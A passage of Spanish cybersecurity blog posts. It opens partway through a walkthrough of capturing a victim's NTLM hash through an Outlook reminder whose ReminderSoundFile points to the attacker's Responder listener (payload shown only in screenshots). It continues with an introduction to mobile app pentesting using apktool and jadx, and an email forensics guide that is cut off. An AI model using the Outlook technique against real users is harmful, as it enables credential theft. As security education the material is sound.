href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-WkBULpoja1kyZWixDtsnYcN-mCPPAW8FXNAkVoKLSK1p8RjyI6fkgaYEwUhpk3vnFM8U3uoRYFCGMP0YU3PMUexJKhviAbj6SX1c3vDbFAKZbtzXcA3SAHoJAFFviJFMnj7kPAwDJLklueoX-XzWK1pReLoWPPTlsGxOt-QX2n_VSUKx3z2uOhcK1gXv/s1117/Imagen%203.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="692" data-original-width="1117" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-WkBULpoja1kyZWixDtsnYcN-mCPPAW8FXNAkVoKLSK1p8RjyI6fkgaYEwUhpk3vnFM8U3uoRYFCGMP0YU3PMUexJKhviAbj6SX1c3vDbFAKZbtzXcA3SAHoJAFFviJFMnj7kPAwDJLklueoX-XzWK1pReLoWPPTlsGxOt-QX2n_VSUKx3z2uOhcK1gXv/w640-h396/Imagen%203.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez el responder está activado, deberemos crear una cita en el calendario de Outlook, la cual llevará la carga maliciosa con la que obtendremos el hash NTLM.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_yIqgFw4avq0nGt47EVz5O4zwprwTA8WmSpAE_Ye5lbcF3ab0WMETU3SIdj01agDxLtsstm41o7Vfr3nY7cg92XiHTW7CDCaSrnXIpIcg7RBSMc-8QzMqZ5YPA-F3NNs30rQD_ITq9Rqo0UBNWuFc-6LL0A5NuzL10Fu5JKcieUAiwCRafX_nyNR4E6C5/s1437/Imagen%204.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="811" data-original-width="1437" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_yIqgFw4avq0nGt47EVz5O4zwprwTA8WmSpAE_Ye5lbcF3ab0WMETU3SIdj01agDxLtsstm41o7Vfr3nY7cg92XiHTW7CDCaSrnXIpIcg7RBSMc-8QzMqZ5YPA-F3NNs30rQD_ITq9Rqo0UBNWuFc-6LL0A5NuzL10Fu5JKcieUAiwCRafX_nyNR4E6C5/w640-h362/Imagen%204.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para que esta cita sea útil, tendremos que establecer un recordatorio en 0 minutos, para que la cita le salte automáticamente a la víctima en el momento en que se envíe. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF9d7pKHT_GooY6_J1DkeKuaMRwk_fId3n1ovWv-qdJ7LVuAi1kPp5YSnYeJRk-XLIPSBBclM2k6GSE6cv3L3Wc1FHVXMWdN2WsgmYXtQYmgLtgVg6rAK1isXnrMWi3z_yCGdse-RO_Goxibk0-sZxOVmTZR21kY8jlP1L3eqI37mFmQrz9UO1CQhUjOYF/s1438/Imagen%205.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="811" data-original-width="1438" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF9d7pKHT_GooY6_J1DkeKuaMRwk_fId3n1ovWv-qdJ7LVuAi1kPp5YSnYeJRk-XLIPSBBclM2k6GSE6cv3L3Wc1FHVXMWdN2WsgmYXtQYmgLtgVg6rAK1isXnrMWi3z_yCGdse-RO_Goxibk0-sZxOVmTZR21kY8jlP1L3eqI37mFmQrz9UO1CQhUjOYF/w640-h360/Imagen%205.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Con el recordatorio establecido a los 0 minutos, utilizaremos la extensión “OutlookSpy”, la cual nos permite poder editar los parámetros internos de Outlook. Una vez abierta, configuraremos el parámetro “ReminderSoundFile” y para ello nos iremos al apartado “script”.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipN0GdqzwwCdM3VkthoGv-Wn91FCdgsMP0EzkEU64ZBF7N7Opz5bvyWI-QnElJRzEjtLJ9okbHZamRdzY1YyfylM-uq2zDyK3D5xW2uGvVwJutYV_vz_m8lbTiqkLzHN56HNWtjZIsarI3oQiOLwt3Ea8Hm_j7pDCo77Y8mM_rFmj4wupkm11v5ySToTvw/s1437/Imagen%206.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="683" data-original-width="1437" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipN0GdqzwwCdM3VkthoGv-Wn91FCdgsMP0EzkEU64ZBF7N7Opz5bvyWI-QnElJRzEjtLJ9okbHZamRdzY1YyfylM-uq2zDyK3D5xW2uGvVwJutYV_vz_m8lbTiqkLzHN56HNWtjZIsarI3oQiOLwt3Ea8Hm_j7pDCo77Y8mM_rFmj4wupkm11v5ySToTvw/w640-h304/Imagen%206.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Cuando estemos dentro de este apartado, cambiaremos los parámetros que vemos a continuación. Estos parámetros son: </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">-<span style="white-space: pre;"> </span>ReminderOverrideDefault: valor que indica que el sonido que se reproducirá será el que se indique en ReminderSoundFile.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">-<span style="white-space: pre;"> </span>ReminderPlaySound: indica si se reproduce un sonido al ejecutarse el recordatorio.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">-<span style="white-space: pre;"> </span>ReminderSoundFile: cadena donde introduciremos el exploit que apunta al responder que tenemos activado en nuestra máquina atacante.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtVhyphenhyphenA5xIRl6Ku5Ht-I9yg4ni_CVnJ8BFsfg9QF4LMBMFWVUdUefdObmqOKGB2g1KZMC9kPlqxrtpLZzhmDTfWHwuNV6pKseQRogSXdYT17LnSsCFWoenBbf7wpoxZOnDqKFk82HaQBytaaeoUzNsOSQX9kw7I_o300AlTF67XDS_Bswl6qSxRbgYIZhmj/s659/Imagen%207.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="478" data-original-width="659" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtVhyphenhyphenA5xIRl6Ku5Ht-I9yg4ni_CVnJ8BFsfg9QF4LMBMFWVUdUefdObmqOKGB2g1KZMC9kPlqxrtpLZzhmDTfWHwuNV6pKseQRogSXdYT17LnSsCFWoenBbf7wpoxZOnDqKFk82HaQBytaaeoUzNsOSQX9kw7I_o300AlTF67XDS_Bswl6qSxRbgYIZhmj/w640-h464/Imagen%207.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez lo tengamos, comprobamos que se han guardado correctamente los cambios.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAQ97s0WJvsEH1Nd6oSndA7ZU2o3Gb41xR_AX4XxZdLLtNtEYvWCpWVAGRThf1quYNu3bnWG4HR8TrYZQIIIBj232x9Hr-xnrrHE9ekuJ-zLqa7KNcytcB_ZM9iZ1gn7OaQQ2QyMNElI20JiUhpLlkI6_ArldzD_mbHVdbAjm1PvR9gzyjQjjR5FnhDIl7/s552/Imagen%208.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="448" data-original-width="552" height="520" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAQ97s0WJvsEH1Nd6oSndA7ZU2o3Gb41xR_AX4XxZdLLtNtEYvWCpWVAGRThf1quYNu3bnWG4HR8TrYZQIIIBj232x9Hr-xnrrHE9ekuJ-zLqa7KNcytcB_ZM9iZ1gn7OaQQ2QyMNElI20JiUhpLlkI6_ArldzD_mbHVdbAjm1PvR9gzyjQjjR5FnhDIl7/w640-h520/Imagen%208.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Y guardamos el archivo.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguwRHWl2CfUHpGImQgHcTYA_FxaM2dcPFjM1fRgM7kjhwcrDx_DwA8OuZ6hLX66Pu3yokpxXTH0h0tYluXF56EDJoEffKfscR-l1rpIwBQJ-lHnoqciZrY_jHzqOJsWCgISZwOZRFA-ZtIfYSoXOPACREBmlL6KBDYBAF13VmX6TNQKYJcS2wEnONhu9xR/s1440/Imagen%209.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="336" data-original-width="1440" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguwRHWl2CfUHpGImQgHcTYA_FxaM2dcPFjM1fRgM7kjhwcrDx_DwA8OuZ6hLX66Pu3yokpxXTH0h0tYluXF56EDJoEffKfscR-l1rpIwBQJ-lHnoqciZrY_jHzqOJsWCgISZwOZRFA-ZtIfYSoXOPACREBmlL6KBDYBAF13VmX6TNQKYJcS2wEnONhu9xR/w640-h150/Imagen%209.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En el momento que le damos a guardar, nos saltará instantáneamente el recordatorio como establecimos anteriormente.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY0Alrpz71OmP0D7DH7nurOb8GoBpje_RL1raHDIp3XtFMLtOVrYyzdlKgwuWBrCGEtJ2_vy17yIZgq39j5ETKG_0_vQedaiLa0hRFbnykHTGZRdpttlfBg2n4mUYPVYSoYuPQlcF5Fvujhoc_dpwNptvr4sVNcGtYPcnPFWT6nlRqio5O2cexeW_U1CDv/s466/Imagen%2010.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="339" data-original-width="466" height="466" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY0Alrpz71OmP0D7DH7nurOb8GoBpje_RL1raHDIp3XtFMLtOVrYyzdlKgwuWBrCGEtJ2_vy17yIZgq39j5ETKG_0_vQedaiLa0hRFbnykHTGZRdpttlfBg2n4mUYPVYSoYuPQlcF5Fvujhoc_dpwNptvr4sVNcGtYPcnPFWT6nlRqio5O2cexeW_U1CDv/w640-h466/Imagen%2010.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Y en el momento que nos salta este recordatorio, vemos que nuestro responder ha pillado el NTLM de la víctima.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkiakw3quwCP-UaZ3pQdxU58Zv2SK19JUbS7_u_NXG3r2uKGyxrGo57IU0e7mek-7CPosQBahS-2UGtupVKEPAvD7QhyCXt1T0ZpDRdqJe9kV4O6PWGzQK-Jgh55STIhYMGdJZJsTMSx1a29jwew8m8F7chM7hbMc7rmSAB7is_7vPlk6fDqibeilC6cPv/s896/Imagen%2011.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="359" data-original-width="896" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkiakw3quwCP-UaZ3pQdxU58Zv2SK19JUbS7_u_NXG3r2uKGyxrGo57IU0e7mek-7CPosQBahS-2UGtupVKEPAvD7QhyCXt1T0ZpDRdqJe9kV4O6PWGzQK-Jgh55STIhYMGdJZJsTMSx1a29jwew8m8F7chM7hbMc7rmSAB7is_7vPlk6fDqibeilC6cPv/w640-h256/Imagen%2011.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Hasta aquí hemos llegado con el análisis. Esperamos que os haya gustado y os vemos en la próxima entrega de FluProject.</span></div><div style="text-align: justify;"><br /></div><div style="text-align: right;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.linkedin.com/in/sergiogarc%C3%ADarodr%C3%ADguez/">Sergio García</a>, Cybersecurity Management Student en <a href="http://www.zerolynx.com/es">Zerolynx</a>.</span></div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-39172447321319147072023-12-11T09:00:00.012+01:002023-12-11T17:50:24.977+01:00Introducción al pentesting de aplicaciones móviles sin morir en el intento<p style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPjhaBYQLhQoCa_JDekHkP6meXvasgpy6dxFakOg2nyZQbkyGIPiRWcW69S_HEToAEFr1a9OZUXzqjseJQy4SABg_JpKAl7_L9E9WuOMi5BhRKcM0-E2K49MQshTQ5KcNM67SZmjfI2Naqoo7ENgVkeogiroGn7V4SWEJTd9yuvnOby4WsynIFXBTuIhBT/s1920/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(14).jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Pentest para moviles" border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPjhaBYQLhQoCa_JDekHkP6meXvasgpy6dxFakOg2nyZQbkyGIPiRWcW69S_HEToAEFr1a9OZUXzqjseJQy4SABg_JpKAl7_L9E9WuOMi5BhRKcM0-E2K49MQshTQ5KcNM67SZmjfI2Naqoo7ENgVkeogiroGn7V4SWEJTd9yuvnOby4WsynIFXBTuIhBT/w640-h360/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(14).jpg" title="Pentesting para aplicaciones moviles" width="640" /></a></div><br /><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Antes de comenzar a hablar de pentesting móvil debemos sentar las bases y diferenciar entre lo que es un análisis estático de la aplicación y un análisis dinámico. Pero no sin antes hablar de la estructura de un APK.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El proceso de desensamblar un APK se denomina descompresión y es por medio de este proceso a través del cual logramos acceder a las entrañas del nuestro binario:</span></p><p></p><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEuLNICh8Kz0WENvGKrg2viWZUPsOftWp0gLMoGXzuBBj2lY9aK1y9chrWH-veFifYyw-uZSFefM-rkCX4xXB1Rm0d1IMsVaXLhpC8Gj3GUM3Qsv0Pka34-6Z_o-uYsAjTuPEWtg6f1L7-OUkDItrM_TlMn95v4F5sDA82Q2_kL6JcuVuypfgLCRJQb__F/s621/2023-12-05%2012_23_52-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="521" data-original-width="621" height="536" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEuLNICh8Kz0WENvGKrg2viWZUPsOftWp0gLMoGXzuBBj2lY9aK1y9chrWH-veFifYyw-uZSFefM-rkCX4xXB1Rm0d1IMsVaXLhpC8Gj3GUM3Qsv0Pka34-6Z_o-uYsAjTuPEWtg6f1L7-OUkDItrM_TlMn95v4F5sDA82Q2_kL6JcuVuypfgLCRJQb__F/w640-h536/2023-12-05%2012_23_52-Mobunty.docx.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para ello, bastaría con:</span></p><p style="text-align: justify;"><span style="font-family: courier;">unzip APP.apk -d output-unzip</span></p><p style="text-align: justify;"><span style="font-family: courier;">apktool d APP.apk -o output-apktool</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></p><p><span style="font-family: Barlow Semi Condensed;"></span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">A la hora de decompilar el código fuente, tenemos dos formas, por un lado podemos generar el .smali que es el bytecode “legible” para humanos (apktool), o generar el .java interpretrado, no es el código fuente original, pero nos ayuda a entender la lógica de la aplicación de forma más sencilla (jadx).</span></p><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVT27vKFZaJPcmRhaGmyFvHm8XKlqEOsUDjnlWdPaDhpfqKnOdy_S329NE7fHtaw2IdD31aLi7bCFtyXTsQokIza0IKGoSq_TMycbgxMetvAlXYyGwEgS5U9QGOYgWJdZkIMvvDjwO_mXWXoNzCkpXRdeWj6waJ_8_EALGU9SEsUGOvJ3RBI6iYzbXYEHV/s665/2023-12-05%2012_25_14-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="166" data-original-width="665" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVT27vKFZaJPcmRhaGmyFvHm8XKlqEOsUDjnlWdPaDhpfqKnOdy_S329NE7fHtaw2IdD31aLi7bCFtyXTsQokIza0IKGoSq_TMycbgxMetvAlXYyGwEgS5U9QGOYgWJdZkIMvvDjwO_mXWXoNzCkpXRdeWj6waJ_8_EALGU9SEsUGOvJ3RBI6iYzbXYEHV/w640-h160/2023-12-05%2012_25_14-Mobunty.docx.png" width="640" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez tenemos el código fuente con nosotros pasaremos a hablar de los dos tipos de análisis que son necesarios tener en cuenta a la hora de realizar un pentesting de móvil. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Análisis estático vs Dinámico</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En análisis estático se analiza la aplicación a nivel de código y sin la interacción con la aplicación, y el análisis dinámico se revisa en tiempo de ejecución, interactuando con las funcionalidades.</span></div><h4 style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";">Análisis estático</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Con la herramienta Jadx trataremos de buscar información sensible:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div></div><div style="text-align: left;"><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Palabras claves o patrones vulnerables de código.</span> </li></ul><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";">Credenciales / api keys. </span></li></ul><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";">Urls / endpoints.</span></li></ul><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";">Identificación de funciones importantes: autenticación, cambios de estado, PII.</span></li></ul><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";">Identificación de función de debug. Presencia de comentarios en el código.</span></li></ul><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";">Identificación de funciones peligrosas: uso de almacenamiento externo, ejecución de código. Sanitización.</span></li></ul><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";">Secretos hardcodeados.</span></li></ul></div><div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Automático</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Todo el análisis anterior se puede automatizar con la siguiente herramienta (MobSF):</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCIFRRw4UKAMz5fqhfhkE29dIeGQq-iZGKbcaI44gRhwd5VNgLBKalV21vN5r9sH3L8nVBWm2fqzepd64BD8LzHbbs-mH0T_XjsyM2oJ6U2VRAQbzsUshT6SHh75AlYvhyphenhyphenR1YkO-XuBtqlNV29Xn35j2riWwwWRgeLNqL6LC4riq9EohKu9Px23bIXBN_1/s693/2023-12-05%2012_26_08-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="245" data-original-width="693" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCIFRRw4UKAMz5fqhfhkE29dIeGQq-iZGKbcaI44gRhwd5VNgLBKalV21vN5r9sH3L8nVBWm2fqzepd64BD8LzHbbs-mH0T_XjsyM2oJ6U2VRAQbzsUshT6SHh75AlYvhyphenhyphenR1YkO-XuBtqlNV29Xn35j2riWwwWRgeLNqL6LC4riq9EohKu9Px23bIXBN_1/w640-h226/2023-12-05%2012_26_08-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">A la hora de hablar de pentesting móvil existen una serie de componente interesantes (identificados por Mobsf en la imagen anterior), que os recomendamos que dediques tiempo a entender (actividades, proveedores, receptores y servicios exportables). </span><span style="font-family: "Barlow Semi Condensed";">En el próximo artículo os hablaremos sobre las actividades exportables.</span></div><div style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";"><br /></span></div><div style="text-align: right;"><span style="font-family: "Barlow Semi Condensed";"><a href="https://www.linkedin.com/in/xuqiang-liu-xu-5456b9265/">Xuquiang Liu Xu</a>, Pentester Jr. at <a href="http://www.zerolynx.com">Zerolynx</a> y <a href="https://www.linkedin.com/in/alejandro-au%C3%B1%C3%B3n-le%C3%B3n-86820892/">Alejandro Auñón</a>, Offensive Security Analyst at <a href="http://www.zerolynx.com/es">Zerolynx</a>.</span></div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-15952762870495179732023-12-04T08:30:00.006+01:002023-12-04T18:46:43.090+01:00Cazadores de Evidencia: Navegando por el Análisis Forense de Correos Electrónicos<p style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPNtQS4Jf-9Fq15Sn6fBlw7fqxlYbaqVPhBzrbR1_RXZFgbpE9ufqDUYwqiQCuzN81Mwo3MUcLOYPIyLwYFdUQi9Ip42e2UakYUN9JBpgEYxD0RMB7qfNFyThN6weTcGgVsFooaTPtu8_4TCkpmdWCwjbPYtdBjjjrV3KnGndmYKur0Ul2ggQ-jfjjqKbQ/s1920/An%C3%A1lisis%20forense%20en%20correos%20electr%C3%B3nicos.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPNtQS4Jf-9Fq15Sn6fBlw7fqxlYbaqVPhBzrbR1_RXZFgbpE9ufqDUYwqiQCuzN81Mwo3MUcLOYPIyLwYFdUQi9Ip42e2UakYUN9JBpgEYxD0RMB7qfNFyThN6weTcGgVsFooaTPtu8_4TCkpmdWCwjbPYtdBjjjrV3KnGndmYKur0Ul2ggQ-jfjjqKbQ/w640-h360/An%C3%A1lisis%20forense%20en%20correos%20electr%C3%B3nicos.jpg" width="640" /></a></div><br /><span style="font-family: Barlow Semi Condensed;"><br /></span><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En la realización de los análisis, ya bien sean del ámbito forense, de inteligencia, financiero u otros, destaca la búsqueda de la verdad. La verdad como objetivo y utilizando como medio la razón, así como Descartes describió en su día en el Discurso del método<i> para dirigir bien la razón y buscar la verdad en las ciencias.</i> Los analistas pretendemos averiguar lo sucedido y dar respuesta a las inquietudes del cliente, sin dejar de lado que, en ocasiones, la verdad es lo más complejo de atestiguar.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El análisis forense de correos electrónicos surge casi en su totalidad tras un suceso o incidente que requiere ser investigado. Estos análisis se comprenden en ocasiones de dos partes, la tecnológica (el proceso de envío y recepción) y la de información (contenida en el correo y/o adjunta en él).</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Las consideraciones principales para realizar el análisis tecnológico de los correos fraudulentos, aunque no siempre tendrán cabida en todos los análisis, pero que es necesario contemplar inicialmente, son:</span></p><p style="text-align: justify;"></p><ul><li><span style="font-family: Barlow Semi Condensed;">Identificar unívocamente los servicios de correo involucrados tanto en origen como en destino. Se debe identificar la tecnología de correo de las dos partes, bien podrían ser correos en la nube (SaaS) o servidores de correo on premise.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Garantizar que los correos no han sido manipulados, obteniendo las muestras de correo a analizar con una cuenta administrativa directamente del servidor, no de los clientes de correo de los usuarios afectados.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Analizar las cabeceras técnicas en los emails recibidos para identificar los servidores origen del envío.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Analizar los elementos de seguridad del correo como:</span></li></ul><p></p><p style="text-align: justify;"></p><ul><ul><li><span style="font-family: Barlow Semi Condensed;"><u>Alineación SPF: </u>La alineación SPF puede considerarse inalterada cuando el dominio de “MAIL-FROM” o “Return-Path“ y de “From” son iguales. La diferencia entre estos podría sugerir que el correo electrónico es falso.</span></li></ul></ul><ul><ul><li><span style="font-family: Barlow Semi Condensed;"><u>Autenticación SPF:</u> Si la autenticación SPF es “false”, significa que la dirección IP del remitente no está autorizada para enviar correo electrónico en nombre de un remitente. Es decir, que no está autorizada a enviar correos electrónicos en nombre del dominio legítimo.</span></li></ul></ul><ul><ul><li><span style="font-family: Barlow Semi Condensed;"><u>Alineación DKIM:</u> Para confirmar la alineación de DKIM en un correo, el campo “DKIM-Signature” debe incluir la firma del dominio de la cabecera “From” en su etiqueta “; d=domain.com”.</span></li></ul></ul><ul><ul><li><span style="font-family: Barlow Semi Condensed;"><u>Autenticación DKIM: </u>Si el campo Firma DKIM no está verificado, puede suponer que el correo electrónico ha sido modificado o alterado.</span></li></ul></ul><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En cuanto a la parte del análisis sobre la información del correo electrónico, es necesario atender de manera objetiva a lo redactado en él, así como a aquello incluido en los archivos adjuntos si lo hubiera. En esta parte, hay que tener en cuenta varias premisas:</span></p><p style="text-align: justify;"></p><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Redacción, estilo literario y ortografía: </b>cada vez más compleja la distinción de mensajes reales o lícitos de aquellos generados por un atacante utilizando Inteligencia Artificial.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Formato de la firma: </b>análisis visual de la firma en busca de posibles falsificaciones o en todo caso, si existe la posibilidad de ser una copia de una firma auténtica, identificando espacios bajo la firma que no debieran de existir.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Datos relevantes: </b>establecer que información en el correo es de dominio público o privado. Posibles esferas de conocimiento de dicha información.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Mención a personas: </b>valorar si se tratan de personas reales o ficticias, en el caso de atacantes, es más probable lo primero, pero es importante no realizar el descarte antes del análisis.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Correos electrónicos filtrados o expuestos: </b>identificar si la cuenta que recibe el correo electrónico esta presente en filtraciones de datos o es posible encontrarla en fuentes abiertas. En el caso de filtraciones de contraseñas, valorar la posibilidad de un compromiso en la 